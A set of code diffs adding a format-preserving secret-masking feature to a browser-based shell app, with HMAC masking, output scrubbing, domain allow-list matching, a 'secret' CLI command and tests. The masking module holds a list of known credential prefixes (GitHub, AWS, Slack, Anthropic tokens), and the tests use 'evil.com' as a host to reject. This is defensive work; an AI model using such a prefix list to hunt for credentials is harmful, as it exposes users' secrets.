+        XCTAssertTrue(result.hasPrefix("sk-ant-"))
+        XCTAssertEqual(result.count, "sk-ant-abcdef".count)
+    }
+
+    func testUnknownPrefixSameLengthHex() {
+        let result = mask(sessionId: "s1", secretName: "CUSTOM", realValue: "myCustomSecret123")
+        XCTAssertEqual(result.count, "myCustomSecret123".count)
+    }
+
+    func testMaskedDiffersFromReal() {
+        let real = "ghp_abc123xyz"
+        let result = mask(sessionId: "s1", secretName: "GH", realValue: real)
+        XCTAssertNotEqual(result, real)
+    }
+
+    func testVeryLongValues() {
+        let real = "sk-" + String(repeating: "a", count: 200)
+        let result = mask(sessionId: "s1", secretName: "KEY", realValue: real)
+        XCTAssertTrue(result.hasPrefix("sk-"))
+        XCTAssertEqual(result.count, real.count)
+    }
+
+    // MARK: - buildScrubber()
+
+    func testScrubberReplacesRealValues() {
+        let scrub = buildScrubber(secrets: [SecretPair(realValue: "secret123", maskedValue: "masked00")])
+        XCTAssertEqual(scrub("token is secret123 here"), "token is masked00 here")
+    }
+
+    func testScrubberMultipleOccurrences() {
+        let scrub = buildScrubber(secrets: [SecretPair(realValue: "abc", maskedValue: "xyz")])
+        XCTAssertEqual(scrub("abc and abc"), "xyz and xyz")
+    }
+
+    func testScrubberMultipleSecrets() {
+        let scrub = buildScrubber(secrets: [
+            SecretPair(realValue: "secret1", maskedValue: "mask_1"),
+            SecretPair(realValue: "secret2", maskedValue: "mask_2"),
+        ])
+        XCTAssertEqual(scrub("secret1 and secret2"), "mask_1 and mask_2")
+    }
+
+    func testScrubberLongestMatchFirst() {
+        let scrub = buildScrubber(secrets: [
+            SecretPair(realValue: "sec", maskedValue: "XX"),
+            SecretPair(realValue: "secret", maskedValue: "YYYYYY"),
+        ])
+        XCTAssertEqual(scrub("my secret key"), "my YYYYYY key")
+    }
+
+    func testScrubberEmptySecrets() {
+        let scrub = buildScrubber(secrets: [])
+        XCTAssertEqual(scrub("hello"), "hello")
+    }
+
+    // MARK: - domainMatches()
+
+    func testExactDomainMatch() {
+        XCTAssertTrue(domainMatches(pattern: "api.github.com", hostname: "api.github.com"))
+    }
+
+    func testExactDomainMismatch() {
+        XCTAssertFalse(domainMatches(pattern: "api.github.com", hostname: "evil.com"))
+    }
+
+    func testWildcardMatchesSubdomain() {
+        XCTAssertTrue(domainMatches(pattern: "*.github.com", hostname: "api.github.com"))
+        XCTAssertTrue(domainMatches(pattern: "*.github.com", hostname: "uploads.github.com"))
+    }
+
+    func testWildcardDoesNotMatchBareDomain() {
+        XCTAssertFalse(domainMatches(pattern: "*.github.com", hostname: "github.com"))
+    }
+
+    func testCaseInsensitive() {
+        XCTAssertTrue(domainMatches(pattern: "*.GitHub.COM", hostname: "API.github.com"))
+        XCTAssertTrue(domainMatches(pattern: "Api.GitHub.com", hostname: "api.github.com"))
+    }
+
+    func testRejectsPartialSuffixMatch() {
+        XCTAssertFalse(domainMatches(pattern: "*.github.com", hostname: "notgithub.com"))
+    }
+
+    // MARK: - isAllowedDomain()
+
+    func testAllowedDomainAnyMatch() {
+        XCTAssertTrue(isAllowedDomain(patterns: ["api.github.com", "*.openai.com"], hostname: "api.openai.com"))
+    }
+
+    func testAllowedDomainNoMatch() {
+        XCTAssertFalse(isAllowedDomain(patterns: ["api.github.com"], hostname: "evil.com"))
+    }
+
+    func testAllowedDomainEmpty() {
+        XCTAssertFalse(isAllowedDomain(patterns: [], hostname: "anything.com"))
+    }
+}
+

--- a/packages/webapp/src/core/secret-env.ts
+++ b/packages/webapp/src/core/secret-env.ts
@@ -1,0 +1,66 @@
+/**
+ * Secret environment population — fetches masked secret values from the server
+ * and returns them as env vars for the shell.
+ *
+ * The server generates deterministic masked values per session using HMAC-SHA256.
+ * The real values never leave the server. The shell only sees masked values,
+ * which look like real tokens but aren't.
+ */
+
+import { createLogger } from './logger.js';
+
+const log = createLogger('secret-env');
+
+export interface MaskedSecretEntry {
+  name: string;
+  maskedValue: string;
+  domains: string[];
+}
+
+/**
+ * Fetch masked secret values from the server's /api/secrets/masked endpoint.
+ * Returns a Record<name, maskedValue> suitable for passing as shell env vars.
+ *
+ * Fails silently (returns empty object) if the server is unavailable or
+ * returns an error — secrets are optional and shouldn't block shell init.
+ */
+export async function fetchSecretEnvVars(): Promise<Record<string, string>> {
+  const isExtension = typeof chrome !== 'undefined' && !!chrome?.runtime?.id;
+
+  // Extension mode has no server-side proxy — secrets unavailable
+  if (isExtension) {
+    return {};
+  }
+
+  try {
+    const resp = await fetch('/api/secrets/masked');
+    if (!resp.ok) {
+      log.warn('Failed to fetch masked secrets', { status: resp.status });
+      return {};
+    }
+
+    const entries: MaskedSecretEntry[] = await resp.json();
+    if (!Array.isArray(entries) || entries.length === 0) {
+      return {};
+    }
+
+    const env: Record<string, string> = {};
+    for (const entry of entries) {
+      if (entry.name && entry.maskedValue) {
+        env[entry.name] = entry.maskedValue;
+      }
+    }
+
+    if (Object.keys(env).length > 0) {
+      log.info('Loaded masked secrets into shell env', { count: Object.keys(env).length });
+    }
+
+    return env;
+  } catch (err) {
+    // Server unavailable or network error — degrade gracefully
+    log.debug('Could not fetch masked secrets (server may be unavailable)', {
+      error: err instanceof Error ? err.message : String(err),
+    });
+    return {};
+  }
+}

--- a/packages/webapp/src/core/secret-masking.ts
+++ b/packages/webapp/src/core/secret-masking.ts
@@ -1,0 +1,146 @@
+/**
+ * Secret masking engine — HMAC-SHA256 based, format-preserving.
+ *
+ * Used on both agent side (env population, output scrubbing) and
+ * server side (fetch proxy response scrubbing).
+ */
+
+// ---------- Known token prefixes ----------
+
+const KNOWN_PREFIXES: string[] = [
+  'ghp_', // GitHub PAT
+  'gho_', // GitHub OAuth
+  'ghu_', // GitHub user-to-server
+  'ghs_', // GitHub server-to-server
+  'ghr_', // GitHub refresh
+  'github_pat_', // GitHub fine-grained PAT
+  'sk-', // OpenAI / Stripe secret key
+  'pk-', // Stripe publishable key
+  'xoxb-', // Slack bot token
+  'xoxp-', // Slack user token
+  'xoxa-', // Slack app token
+  'xoxs-', // Slack session token
+  'AKIA', // AWS access key ID
+  'ABIA', // AWS STS
+  'ACCA', // AWS alternate
+  'ASIA', // AWS temporary
+  'sk-ant-', // Anthropic
+  'Bearer ', // generic bearer (keep space)
+];
+
+// Sort longest-first so we match the most specific prefix
+const SORTED_PREFIXES = [...KNOWN_PREFIXES].sort((a, b) => b.length - a.length);
+
+/**
+ * Detect a known prefix from the value. Returns the prefix string or empty.
+ */
+function detectPrefix(value: string): string {
+  for (const p of SORTED_PREFIXES) {
+    if (value.startsWith(p)) return p;
+  }
+  return '';
+}
+
+// ---------- HMAC-SHA256 ----------
+
+async function hmacSha256(key: string, message: string): Promise<Uint8Array> {
+  const enc = new TextEncoder();
+  const cryptoKey = await crypto.subtle.importKey(
+    'raw',
+    enc.encode(key),
+    { name: 'HMAC', hash: 'SHA-256' },
+    false,
+    ['sign']
+  );
+  const sig = await crypto.subtle.sign('HMAC', cryptoKey, enc.encode(message));
+  return new Uint8Array(sig);
+}
+
+function toHex(bytes: Uint8Array): string {
+  return Array.from(bytes)
+    .map((b) => b.toString(16).padStart(2, '0'))
+    .join('');
+}
+
+// ---------- Public API ----------
+
+/**
+ * Produce a deterministic, format-preserving masked value.
+ *
+ * `masked = prefix + hex(HMAC-SHA256(sessionId+secretName, realValue))`
+ * truncated/repeated to match `realValue.length - prefix.length`.
+ */
+export async function mask(
+  sessionId: string,
+  secretName: string,
+  realValue: string
+): Promise<string> {
+  const prefix = detectPrefix(realValue);
+  const remainder = realValue.slice(prefix.length);
+
+  const hmac = await hmacSha256(sessionId + secretName, realValue);
+  let hex = toHex(hmac);
+
+  // Repeat hex if remainder is longer than 64 hex chars
+  while (hex.length < remainder.length) hex += hex;
+  const maskedRemainder = hex.slice(0, remainder.length);
+
+  return prefix + maskedRemainder;
+}
+
+export interface SecretPair {
+  realValue: string;
+  maskedValue: string;
+}
+
+/**
+ * Build a reusable scrubber function that replaces every occurrence
+ * of any `realValue` with its `maskedValue`.
+ *
+ * For a small number of secrets a simple sequential replace is fine.
+ * Secrets are sorted longest-first to avoid partial-match issues.
+ */
+export function buildScrubber(secrets: SecretPair[]): (text: string) => string {
+  if (secrets.length === 0) return (t) => t;
+
+  // Sort longest real values first to avoid sub-string clobbering
+  const sorted = [...secrets].sort((a, b) => b.realValue.length - a.realValue.length);
+
+  return (text: string): string => {
+    let result = text;
+    for (const { realValue, maskedValue } of sorted) {
+      if (result.includes(realValue)) {
+        result = result.split(realValue).join(maskedValue);
+      }
+    }
+    return result;
+  };
+}
+
+/**
+ * Domain glob matching.
+ *
+ * - `api.github.com` matches exactly `api.github.com`
+ * - `*.github.com`   matches `api.github.com`, `uploads.github.com`,
+ *                     but NOT `github.com` itself
+ */
+export function domainMatches(pattern: string, hostname: string): boolean {
+  const p = pattern.toLowerCase();
+  const h = hostname.toLowerCase();
+
+  if (!p.startsWith('*.')) {
+    return p === h;
+  }
+
+  // Wildcard: `*.example.com`
+  const suffix = p.slice(1); // `.example.com`
+  // hostname must end with `.example.com` AND have at least one char before
+  return h.length > suffix.length && h.endsWith(suffix);
+}
+
+/**
+ * Check if hostname is allowed by any of the domain patterns.
+ */
+export function isAllowedDomain(patterns: string[], hostname: string): boolean {
+  return patterns.some((p) => domainMatches(p, hostname));
+}

--- a/packages/webapp/src/core/secret-masking.ts
+++ b/packages/webapp/src/core/secret-masking.ts
@@ -128,6 +128,8 @@ export function domainMatches(pattern: string, hostname: string): boolean {
   const p = pattern.toLowerCase();
   const h = hostname.toLowerCase();
 
+  if (p === '*') return true;
+
   if (!p.startsWith('*.')) {
     return p === h;
   }

--- a/packages/webapp/src/scoops/scoop-context.ts
+++ b/packages/webapp/src/scoops/scoop-context.ts
@@ -40,6 +40,7 @@ import {
   createScoopManagementTools,
   type ScoopManagementToolsConfig,
 } from './scoop-management-tools.js';
+import { fetchSecretEnvVars } from '../core/secret-env.js';
 
 const log = createLogger('scoop-context');
 
@@ -148,10 +149,15 @@ export class ScoopContext {
 
       const effectiveSkillsFs = (this.skillsFs ?? this.fs) as VirtualFS;
 
+      // Fetch masked secret values from the server to populate shell environment.
+      // Real values never leave the server — only deterministic masked values are used.
+      const secretEnv = await fetchSecretEnvVars();
+
       // Pass effectiveSkillsFs for JSH discovery so scoops can find .jsh files from all loaded skills
       this.shell = new WasmShell({
         fs: this.fs as VirtualFS,
         cwd,
+        env: Object.keys(secretEnv).length > 0 ? secretEnv : undefined,
         browserAPI: browser,
         jshDiscoveryFs: this.skillsFs ? effectiveSkillsFs : undefined,
       });

--- a/packages/webapp/src/shell/supplemental-commands/help-command.ts
+++ b/packages/webapp/src/shell/supplemental-commands/help-command.ts
@@ -50,6 +50,7 @@ const COMMAND_CATEGORIES = new Map<string, string[]>([
       'man',
       'host',
       'oauth-token',
+      'secret',
       'nuke',
       'models',
       'cost',

--- a/packages/webapp/src/shell/supplemental-commands/index.ts
+++ b/packages/webapp/src/shell/supplemental-commands/index.ts
@@ -19,6 +19,7 @@ import { createWebhookCommand } from './webhook-command.js';
 import { createCrontaskCommand } from './crontask-command.js';
 import { createSprinkleCommand } from './sprinkle-command.js';
 import { createOAuthTokenCommand } from './oauth-token-command.js';
+import { createSecretCommand } from './secret-command.js';
 import { createRsyncCommand } from './rsync-command.js';
 import { createWhichCommand } from './which-command.js';
 import { createZipCommand } from './zip-command.js';
@@ -74,6 +75,7 @@ export function createSupplementalCommands(options: SupplementalCommandsConfig =
     createUnameCommand(),
     createManCommand(),
     createOAuthTokenCommand(),
+    createSecretCommand(),
     createRsyncCommand({ fs: options.fs }),
     createScreencaptureCommand(),
     createPbcopyCommand(),

--- a/packages/webapp/src/shell/supplemental-commands/secret-command.ts
+++ b/packages/webapp/src/shell/supplemental-commands/secret-command.ts
@@ -1,0 +1,203 @@
+import { defineCommand } from 'just-bash';
+import type { Command } from 'just-bash';
+
+function helpText(): string {
+  return `secret — manage secrets for the fetch proxy
+
+Usage:
+  secret set <name> --domain <patterns>   Store a secret (prompts for value)
+  secret list                             List stored secrets (names + domains)
+  secret delete <name>                    Delete a secret
+  secret test <name> <url>                Check if a URL matches a secret's domains
+  secret --help                           Show this help message
+
+The --domain flag accepts a comma-separated list of domain patterns.
+Patterns support exact matches and wildcards (e.g. *.github.com).
+
+Examples:
+  secret set GITHUB_TOKEN --domain "api.github.com,*.github.com"
+  secret list
+  secret delete GITHUB_TOKEN
+  secret test GITHUB_TOKEN https://api.github.com/repos
+`;
+}
+
+interface SecretEntry {
+  name: string;
+  domains: string[];
+}
+
+async function apiCall(
+  method: string,
+  path: string,
+  body?: unknown
+): Promise<{ ok: boolean; status: number; data: unknown }> {
+  const isExtension = typeof chrome !== 'undefined' && !!chrome?.runtime?.id;
+  if (isExtension) {
+    throw new Error('Secrets CLI is only available in CLI mode');
+  }
+
+  const init: RequestInit = {
+    method,
+    headers: { 'Content-Type': 'application/json' },
+  };
+  if (body) {
+    init.body = JSON.stringify(body);
+  }
+
+  const resp = await fetch(`/api/secrets${path}`, init);
+  const data = await resp.json().catch(() => ({}));
+  return { ok: resp.ok, status: resp.status, data };
+}
+
+function parseDomainFlag(args: string[]): string[] | null {
+  const idx = args.indexOf('--domain');
+  if (idx === -1 || !args[idx + 1]) return null;
+  return args[idx + 1]
+    .split(',')
+    .map((d) => d.trim())
+    .filter((d) => d.length > 0);
+}
+
+export function createSecretCommand(): Command {
+  return defineCommand('secret', async (args, ctx) => {
+    if (args.length === 0 || args.includes('--help') || args.includes('-h')) {
+      return { stdout: helpText(), stderr: '', exitCode: 0 };
+    }
+
+    const subcommand = args[0];
+
+    try {
+      switch (subcommand) {
+        case 'set': {
+          const name = args[1];
+          if (!name || name.startsWith('-')) {
+            return { stdout: '', stderr: 'secret: set requires a <name>\n', exitCode: 1 };
+          }
+
+          const domains = parseDomainFlag(args);
+          if (!domains || domains.length === 0) {
+            return {
+              stdout: '',
+              stderr: 'secret: --domain is required with at least one domain pattern\n',
+              exitCode: 1,
+            };
+          }
+
+          // Read secret value from stdin (e.g. echo "value" | secret set NAME --domain ...)
+          const value = (ctx.stdin ?? '').trim();
+          if (!value) {
+            return {
+              stdout: '',
+              stderr:
+                'secret: no value provided on stdin\nUsage: echo "value" | secret set <name> --domain <patterns>\n',
+              exitCode: 1,
+            };
+          }
+
+          const { ok, data } = await apiCall('POST', '', { name, value, domains });
+          if (!ok) {
+            const err = (data as { error?: string }).error ?? 'unknown error';
+            return { stdout: '', stderr: `secret: failed to set secret: ${err}\n`, exitCode: 1 };
+          }
+
+          return {
+            stdout: `Secret "${name}" saved (${domains.length} domain(s))\n`,
+            stderr: '',
+            exitCode: 0,
+          };
+        }
+
+        case 'list': {
+          const { ok, data } = await apiCall('GET', '');
+          if (!ok) {
+            const err = (data as { error?: string }).error ?? 'unknown error';
+            return { stdout: '', stderr: `secret: failed to list secrets: ${err}\n`, exitCode: 1 };
+          }
+
+          const entries = data as SecretEntry[];
+          if (entries.length === 0) {
+            return { stdout: 'No secrets stored\n', stderr: '', exitCode: 0 };
+          }
+
+          const nameWidth = Math.max(4, ...entries.map((e) => e.name.length));
+          let output = `${'NAME'.padEnd(nameWidth)}  DOMAINS\n`;
+          for (const entry of entries) {
+            output += `${entry.name.padEnd(nameWidth)}  ${entry.domains.join(', ')}\n`;
+          }
+          return { stdout: output, stderr: '', exitCode: 0 };
+        }
+
+        case 'delete': {
+          const name = args[1];
+          if (!name) {
+            return { stdout: '', stderr: 'secret: delete requires a <name>\n', exitCode: 1 };
+          }
+
+          const { ok, data } = await apiCall('DELETE', `/${encodeURIComponent(name)}`);
+          if (!ok) {
+            const err = (data as { error?: string }).error ?? 'unknown error';
+            return { stdout: '', stderr: `secret: failed to delete: ${err}\n`, exitCode: 1 };
+          }
+
+          return { stdout: `Deleted secret "${name}"\n`, stderr: '', exitCode: 0 };
+        }
+
+        case 'test': {
+          const name = args[1];
+          const url = args[2];
+          if (!name || !url) {
+            return { stdout: '', stderr: 'secret: test requires <name> <url>\n', exitCode: 1 };
+          }
+
+          let hostname: string;
+          try {
+            hostname = new URL(url).hostname;
+          } catch {
+            return { stdout: '', stderr: `secret: invalid URL "${url}"\n`, exitCode: 1 };
+          }
+
+          // Fetch the secret's domains from the list endpoint
+          const { ok, data } = await apiCall('GET', '');
+          if (!ok) {
+            return { stdout: '', stderr: 'secret: failed to fetch secrets\n', exitCode: 1 };
+          }
+
+          const entries = data as SecretEntry[];
+          const entry = entries.find((e) => e.name === name);
+          if (!entry) {
+            return { stdout: '', stderr: `secret: no secret named "${name}"\n`, exitCode: 1 };
+          }
+
+          // Client-side domain check using the same logic as the fetch proxy
+          const { isAllowedDomain } = await import('../../core/secret-masking.js');
+          const allowed = isAllowedDomain(entry.domains, hostname);
+
+          if (allowed) {
+            return {
+              stdout: `✓ ${name} is allowed for ${hostname}\n`,
+              stderr: '',
+              exitCode: 0,
+            };
+          } else {
+            return {
+              stdout: `✗ ${name} is NOT allowed for ${hostname}\n  Allowed domains: ${entry.domains.join(', ')}\n`,
+              stderr: '',
+              exitCode: 1,
+            };
+          }
+        }
+
+        default:
+          return {
+            stdout: '',
+            stderr: `secret: unknown command "${subcommand}"\n`,
+            exitCode: 1,
+          };
+      }
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      return { stdout: '', stderr: `secret: ${msg}\n`, exitCode: 1 };
+    }
+  });
+}

--- a/packages/webapp/src/shell/supplemental-commands/secret-command.ts
+++ b/packages/webapp/src/shell/supplemental-commands/secret-command.ts
@@ -5,17 +5,17 @@ function helpText(): string {
   return `secret — manage secrets for the fetch proxy
 
 Usage:
-  secret set <name> --domain <patterns>   Store a secret (prompts for value)
-  secret list                             List stored secrets (names + domains)
-  secret delete <name>                    Delete a secret
-  secret test <name> <url>                Check if a URL matches a secret's domains
-  secret --help                           Show this help message
+  echo 'value' | secret set <name> --domain <patterns>   Store a secret (value via stdin)
+  secret list                                             List stored secrets (names + domains)
+  secret delete <name>                                    Delete a secret
+  secret test <name> <url>                                Check if a URL matches a secret's domains
+  secret --help                                           Show this help message
 
 The --domain flag accepts a comma-separated list of domain patterns.
 Patterns support exact matches and wildcards (e.g. *.github.com).
 
 Examples:
-  secret set GITHUB_TOKEN --domain "api.github.com,*.github.com"
+  echo 'mytoken' | secret set GITHUB_TOKEN --domain "api.github.com,*.github.com"
   secret list
   secret delete GITHUB_TOKEN
   secret test GITHUB_TOKEN https://api.github.com/repos

--- a/packages/webapp/src/shell/supplemental-commands/secret-command.ts
+++ b/packages/webapp/src/shell/supplemental-commands/secret-command.ts
@@ -5,17 +5,17 @@ function helpText(): string {
   return `secret — manage secrets for the fetch proxy
 
 Usage:
-  echo 'value' | secret set <name> --domain <patterns>   Store a secret (value via stdin)
-  secret list                                             List stored secrets (names + domains)
-  secret delete <name>                                    Delete a secret
-  secret test <name> <url>                                Check if a URL matches a secret's domains
-  secret --help                                           Show this help message
+  secret set <name> --domain <patterns>   Show instructions for adding a secret
+  secret list                             List stored secrets (names + domains)
+  secret delete <name>                    Show instructions for removing a secret
+  secret test <name> <url>                Check if a URL matches a secret's domains
+  secret --help                           Show this help message
 
 The --domain flag accepts a comma-separated list of domain patterns.
 Patterns support exact matches and wildcards (e.g. *.github.com).
 
 Examples:
-  echo 'mytoken' | secret set GITHUB_TOKEN --domain "api.github.com,*.github.com"
+  secret set GITHUB_TOKEN --domain "api.github.com,*.github.com"
   secret list
   secret delete GITHUB_TOKEN
   secret test GITHUB_TOKEN https://api.github.com/repos
@@ -60,7 +60,7 @@ function parseDomainFlag(args: string[]): string[] | null {
 }
 
 export function createSecretCommand(): Command {
-  return defineCommand('secret', async (args, ctx) => {
+  return defineCommand('secret', async (args) => {
     if (args.length === 0 || args.includes('--help') || args.includes('-h')) {
       return { stdout: helpText(), stderr: '', exitCode: 0 };
     }
@@ -76,36 +76,18 @@ export function createSecretCommand(): Command {
           }
 
           const domains = parseDomainFlag(args);
-          if (!domains || domains.length === 0) {
-            return {
-              stdout: '',
-              stderr: 'secret: --domain is required with at least one domain pattern\n',
-              exitCode: 1,
-            };
-          }
+          const domainStr = domains && domains.length > 0 ? domains.join(',') : '<domain1,domain2>';
 
-          // Read secret value from stdin (e.g. echo "value" | secret set NAME --domain ...)
-          const value = (ctx.stdin ?? '').trim();
-          if (!value) {
-            return {
-              stdout: '',
-              stderr:
-                'secret: no value provided on stdin\nUsage: echo "value" | secret set <name> --domain <patterns>\n',
-              exitCode: 1,
-            };
-          }
+          let output = `To add the secret "${name}", use one of the following methods:\n\n`;
+          output += `  macOS Keychain (swift-server):\n`;
+          output += `    security add-generic-password -s ai.sliccy.slicc -a ${name} -w '<value>' -U -C note -j '${domainStr}'\n\n`;
+          output += `  Environment file (node-server):\n`;
+          output += `    Add to ~/.slicc/secrets.env:\n`;
+          output += `      ${name}=<value>\n`;
+          output += `      ${name}_DOMAINS=${domainStr}\n\n`;
+          output += `Then restart the server to pick up changes.\n`;
 
-          const { ok, data } = await apiCall('POST', '', { name, value, domains });
-          if (!ok) {
-            const err = (data as { error?: string }).error ?? 'unknown error';
-            return { stdout: '', stderr: `secret: failed to set secret: ${err}\n`, exitCode: 1 };
-          }
-
-          return {
-            stdout: `Secret "${name}" saved (${domains.length} domain(s))\n`,
-            stderr: '',
-            exitCode: 0,
-          };
+          return { stdout: output, stderr: '', exitCode: 0 };
         }
 
         case 'list': {
@@ -134,13 +116,14 @@ export function createSecretCommand(): Command {
             return { stdout: '', stderr: 'secret: delete requires a <name>\n', exitCode: 1 };
           }
 
-          const { ok, data } = await apiCall('DELETE', `/${encodeURIComponent(name)}`);
-          if (!ok) {
-            const err = (data as { error?: string }).error ?? 'unknown error';
-            return { stdout: '', stderr: `secret: failed to delete: ${err}\n`, exitCode: 1 };
-          }
+          let output = `To delete the secret "${name}", use one of the following methods:\n\n`;
+          output += `  macOS Keychain (swift-server):\n`;
+          output += `    security delete-generic-password -s ai.sliccy.slicc -a ${name}\n\n`;
+          output += `  Environment file (node-server):\n`;
+          output += `    Remove the ${name}= and ${name}_DOMAINS= lines from ~/.slicc/secrets.env\n\n`;
+          output += `Then restart the server to pick up changes.\n`;
 
-          return { stdout: `Deleted secret "${name}"\n`, stderr: '', exitCode: 0 };
+          return { stdout: output, stderr: '', exitCode: 0 };
         }
 
         case 'test': {

--- a/packages/webapp/src/ui/main.ts
+++ b/packages/webapp/src/ui/main.ts
@@ -324,10 +324,16 @@ async function mainExtension(app: HTMLElement): Promise<void> {
   try {
     const { WasmShell } = await import('../shell/index.js');
     const { PanelCdpProxy, BrowserAPI: BrowserAPIClass } = await import('../cdp/index.js');
+    const { fetchSecretEnvVars } = await import('../core/secret-env.js');
     const panelCdp = new PanelCdpProxy();
     await panelCdp.connect();
     const panelBrowser = new BrowserAPIClass(panelCdp);
-    const shell = new WasmShell({ fs: localFs, browserAPI: panelBrowser });
+    const secretEnv = await fetchSecretEnvVars();
+    const shell = new WasmShell({
+      fs: localFs,
+      browserAPI: panelBrowser,
+      env: Object.keys(secretEnv).length > 0 ? secretEnv : undefined,
+    });
     await layout.panels.terminal.mountShell(shell);
     log.info('Terminal mounted with shared VFS and BrowserAPI (CDP proxy)');
   } catch (e) {
@@ -1121,7 +1127,13 @@ async function main(): Promise<void> {
 
     try {
       const { WasmShell } = await import('../shell/index.js');
-      const shell = new WasmShell({ fs: sharedFs, browserAPI: browser });
+      const { fetchSecretEnvVars } = await import('../core/secret-env.js');
+      const secretEnv = await fetchSecretEnvVars();
+      const shell = new WasmShell({
+        fs: sharedFs,
+        browserAPI: browser,
+        env: Object.keys(secretEnv).length > 0 ? secretEnv : undefined,
+      });
       await layout.panels.terminal.mountShell(shell);
       log.info('Terminal mounted with shared VFS');
 

--- a/packages/webapp/tests/core/secret-masking.test.ts
+++ b/packages/webapp/tests/core/secret-masking.test.ts
@@ -1,0 +1,163 @@
+import { describe, it, expect } from 'vitest';
+import {
+  mask,
+  buildScrubber,
+  domainMatches,
+  isAllowedDomain,
+} from '../../src/core/secret-masking.js';
+
+describe('mask()', () => {
+  it('produces deterministic output for same inputs', async () => {
+    const a = await mask('session-1', 'GITHUB_TOKEN', 'ghp_abc123xyz');
+    const b = await mask('session-1', 'GITHUB_TOKEN', 'ghp_abc123xyz');
+    expect(a).toBe(b);
+  });
+
+  it('produces different output for different sessions', async () => {
+    const a = await mask('session-1', 'GITHUB_TOKEN', 'ghp_abc123xyz');
+    const b = await mask('session-2', 'GITHUB_TOKEN', 'ghp_abc123xyz');
+    expect(a).not.toBe(b);
+  });
+
+  it('produces different output for different secret names', async () => {
+    const a = await mask('session-1', 'TOKEN_A', 'sk-abc123');
+    const b = await mask('session-1', 'TOKEN_B', 'sk-abc123');
+    expect(a).not.toBe(b);
+  });
+
+  it('preserves ghp_ prefix', async () => {
+    const result = await mask('s1', 'GH', 'ghp_abc123xyz');
+    expect(result.startsWith('ghp_')).toBe(true);
+    expect(result.length).toBe('ghp_abc123xyz'.length);
+  });
+
+  it('preserves sk- prefix', async () => {
+    const result = await mask('s1', 'OPENAI', 'sk-someLongKey123');
+    expect(result.startsWith('sk-')).toBe(true);
+    expect(result.length).toBe('sk-someLongKey123'.length);
+  });
+
+  it('preserves AKIA prefix', async () => {
+    const result = await mask('s1', 'AWS', 'AKIAIOSFODNN7EXAMPLE');
+    expect(result.startsWith('AKIA')).toBe(true);
+    expect(result.length).toBe('AKIAIOSFODNN7EXAMPLE'.length);
+  });
+
+  it('preserves xoxb- prefix', async () => {
+    const result = await mask('s1', 'SLACK', 'xoxb-123-456-abc');
+    expect(result.startsWith('xoxb-')).toBe(true);
+    expect(result.length).toBe('xoxb-123-456-abc'.length);
+  });
+
+  it('preserves github_pat_ prefix', async () => {
+    const result = await mask('s1', 'GH', 'github_pat_abc123');
+    expect(result.startsWith('github_pat_')).toBe(true);
+    expect(result.length).toBe('github_pat_abc123'.length);
+  });
+
+  it('preserves sk-ant- prefix', async () => {
+    const result = await mask('s1', 'ANTH', 'sk-ant-abcdef');
+    expect(result.startsWith('sk-ant-')).toBe(true);
+    expect(result.length).toBe('sk-ant-abcdef'.length);
+  });
+
+  it('handles unknown prefix with same-length hex', async () => {
+    const result = await mask('s1', 'CUSTOM', 'myCustomSecret123');
+    expect(result.length).toBe('myCustomSecret123'.length);
+    // no known prefix preserved
+    expect(result).toMatch(/^[0-9a-f]+$/);
+  });
+
+  it('masked value differs from real value', async () => {
+    const real = 'ghp_abc123xyz';
+    const result = await mask('s1', 'GH', real);
+    expect(result).not.toBe(real);
+  });
+
+  it('handles very long values', async () => {
+    const real = 'sk-' + 'a'.repeat(200);
+    const result = await mask('s1', 'KEY', real);
+    expect(result.startsWith('sk-')).toBe(true);
+    expect(result.length).toBe(real.length);
+  });
+});
+
+describe('buildScrubber()', () => {
+  it('replaces real values with masked values', () => {
+    const scrub = buildScrubber([{ realValue: 'secret123', maskedValue: 'masked00' }]);
+    expect(scrub('token is secret123 here')).toBe('token is masked00 here');
+  });
+
+  it('replaces multiple occurrences', () => {
+    const scrub = buildScrubber([{ realValue: 'abc', maskedValue: 'xyz' }]);
+    expect(scrub('abc and abc')).toBe('xyz and xyz');
+  });
+
+  it('handles multiple secrets', () => {
+    const scrub = buildScrubber([
+      { realValue: 'secret1', maskedValue: 'mask_1' },
+      { realValue: 'secret2', maskedValue: 'mask_2' },
+    ]);
+    expect(scrub('secret1 and secret2')).toBe('mask_1 and mask_2');
+  });
+
+  it('replaces longest match first', () => {
+    const scrub = buildScrubber([
+      { realValue: 'sec', maskedValue: 'XX' },
+      { realValue: 'secret', maskedValue: 'YYYYYY' },
+    ]);
+    expect(scrub('my secret key')).toBe('my YYYYYY key');
+  });
+
+  it('returns identity for empty secrets', () => {
+    const scrub = buildScrubber([]);
+    expect(scrub('hello')).toBe('hello');
+  });
+
+  it('handles text with no matches', () => {
+    const scrub = buildScrubber([{ realValue: 'nothere', maskedValue: 'masked' }]);
+    expect(scrub('nothing to replace')).toBe('nothing to replace');
+  });
+});
+
+describe('domainMatches()', () => {
+  it('matches exact domain', () => {
+    expect(domainMatches('api.github.com', 'api.github.com')).toBe(true);
+  });
+
+  it('rejects different exact domain', () => {
+    expect(domainMatches('api.github.com', 'evil.com')).toBe(false);
+  });
+
+  it('wildcard matches subdomain', () => {
+    expect(domainMatches('*.github.com', 'api.github.com')).toBe(true);
+    expect(domainMatches('*.github.com', 'uploads.github.com')).toBe(true);
+  });
+
+  it('wildcard does NOT match bare domain', () => {
+    expect(domainMatches('*.github.com', 'github.com')).toBe(false);
+  });
+
+  it('is case-insensitive', () => {
+    expect(domainMatches('*.GitHub.COM', 'API.github.com')).toBe(true);
+    expect(domainMatches('Api.GitHub.com', 'api.github.com')).toBe(true);
+  });
+
+  it('rejects partial suffix match', () => {
+    expect(domainMatches('*.github.com', 'notgithub.com')).toBe(false);
+  });
+});
+
+describe('isAllowedDomain()', () => {
+  it('returns true if any pattern matches', () => {
+    expect(isAllowedDomain(['api.github.com', '*.openai.com'], 'api.openai.com')).toBe(true);
+  });
+
+  it('returns false if no pattern matches', () => {
+    expect(isAllowedDomain(['api.github.com'], 'evil.com')).toBe(false);
+  });
+
+  it('returns false for empty patterns', () => {
+    expect(isAllowedDomain([], 'anything.com')).toBe(false);
+  });
+});

--- a/packages/webapp/tests/core/secret-masking.test.ts
+++ b/packages/webapp/tests/core/secret-masking.test.ts
@@ -146,6 +146,12 @@ describe('domainMatches()', () => {
   it('rejects partial suffix match', () => {
     expect(domainMatches('*.github.com', 'notgithub.com')).toBe(false);
   });
+
+  it('bare * matches any domain', () => {
+    expect(domainMatches('*', 'api.github.com')).toBe(true);
+    expect(domainMatches('*', 'example.com')).toBe(true);
+    expect(domainMatches('*', 'localhost')).toBe(true);
+  });
 });
